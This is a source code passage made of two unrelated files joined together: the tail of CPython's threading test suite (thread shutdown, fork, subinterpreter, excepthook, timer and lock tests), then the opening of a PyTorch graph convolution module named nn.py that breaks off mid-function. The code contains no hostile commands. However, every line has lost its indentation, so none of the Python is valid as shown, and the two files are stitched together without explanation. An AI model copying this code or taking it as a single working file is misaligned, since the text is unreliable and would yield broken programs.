worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'needs os.fork()')
def test_fork_at_exit(self):
# bpo-42350: Calling os.fork() after threading._shutdown() must
# not log an error.
code = textwrap.dedent("""
import atexit
import os
import sys
from test.support import wait_process
# Import the threading module to register its "at fork" callback
import threading
def exit_handler():
pid = os.fork()
if not pid:
print("child process ok", file=sys.stderr, flush=True)
# child process
sys.exit()
else:
wait_process(pid, exitcode=0)
# exit_handler() will be called after threading._shutdown()
atexit.register(exit_handler)
""")
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err.rstrip(), b'child process ok')
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
def test_leak_without_join(self):
# bpo-37788: Test that a thread which is not joined explicitly
# does not leak. Test written for reference leak checks.
def noop(): pass
with support.wait_threads_exit():
threading.Thread(target=noop).start()
# Thread.join() is not called
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
def test_multithread_modify_file_noerror(self):
# See issue25872
def modify_file():
with open(test.support.TESTFN, 'w', encoding='utf-8') as fp:
fp.write(' ')
traceback.format_stack()
self.addCleanup(unlink, test.support.TESTFN)
threads = [
threading.Thread(target=modify_file)
for i in range(100)
]
for t in threads:
t.start()
t.join()
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
nn.py
|
r"""
Neural network modules, datasets & data loaders, and other utilities
"""
import collections
import functools
import multiprocessing
import operator
import os
import queue
import signal
from math import ceil, sqrt
from typing import Any, Hashable, List, Mapping, Optional, Tuple
import numpy as np
import pynvml
import scipy.sparse
import torch
import torch.nn.functional as F
from torch.nn.modules.batchnorm import _NormBase
from ..num import vertex_degrees
from ..typehint import Array, RandomState
from ..utils import config, get_rs, logged, processes
#-------------------------- Neural network modules -----------------------------
class GraphConv(torch.nn.Module):
r"""
Graph convolution (propagation only)
"""
def forward(
self, input: torch.Tensor, eidx: torch.Tensor,
enorm: torch.Tensor, esgn: torch.Tensor
) -> torch.Tensor:
r"""
Forward propagation
Parameters
----------
input
Input data (:math:`n_{vertices} \times n_{features}`)
eidx
Vertex indices of edges (:math:`2 \times n_{edges}`)
enorm
Normalized weight of edges (:math:`n_{edges}`)
esgn
Sign of edges (:math:`n_{edges}`)
Returns
-------
result
Graph convolution result (:math:`n_{vertices} \times n_{features}`)
"""
sidx, tidx = eidx # source index and target index
message = input[sidx] * (esgn * enorm).unsqueeze(1) # n_edges * n_features
res = torch.zeros_like(input)
tidx = tidx.unsqueeze(1).expand_as(message) # n_edges * n_features
res.scatter_add_(0, tidx, message)
return res
class GraphAttent(torch.nn.Module): # pragma: no cover
r"""
Graph attention
Parameters
----------
in_features
Input dimensionality
out_featres
Output dimensionality
Note
----
**EXPERIMENTAL**
"""
def __init__(self, in_features: int, out_features: int) -> None:
super().__init__()
self.weight = torch.nn.ParameterDict({
"pos": torch.nn.Parameter(torch.Tensor(out_features, in_features)),
"neg": torch.nn.Parameter(torch.Tensor(out_features, in_features))
})
self.head = torch.nn.ParameterDict({
"pos": torch.nn.Parameter(torch.zeros(out_features * 2)),
"neg": torch.nn.Parameter(torch.zeros(out_features * 2))
})
torch.nn.init.kaiming_uniform_(self.weight["pos"], sqrt(5)) # Following torch.nn.Linear
torch.nn.init.kaiming_uniform_(self.weight["neg"], sqrt(5)) # Following torch.nn.Linear
def forward(
self, input: torch.Tensor, eidx: torch.Tensor,
ewt: torch.Tensor, esgn: torch.Tensor
) -> torch.Tensor:
r"""
Forward propagation
Parameters
----------
input
Input data (:math:`n_{vertices} \times n_{features}`)
eidx
Vertex indices of edges (:math:`2 \times n_{edges}`)
ewt
Weight of edges (:math:`n_{edges}`)
esgn
Sign of edges (:math:`n_{edges}`)
Returns
-------
result
Graph attention result (:math:`n_{vertices} \times n_{features}`)
"""
res_dict = {}
for sgn in ("pos", "neg"):
mask = esgn == 1 if sgn == "pos" else esgn == -1
sidx, tidx = eidx[:, mask]
ptr = input @ self.weight[sgn].T
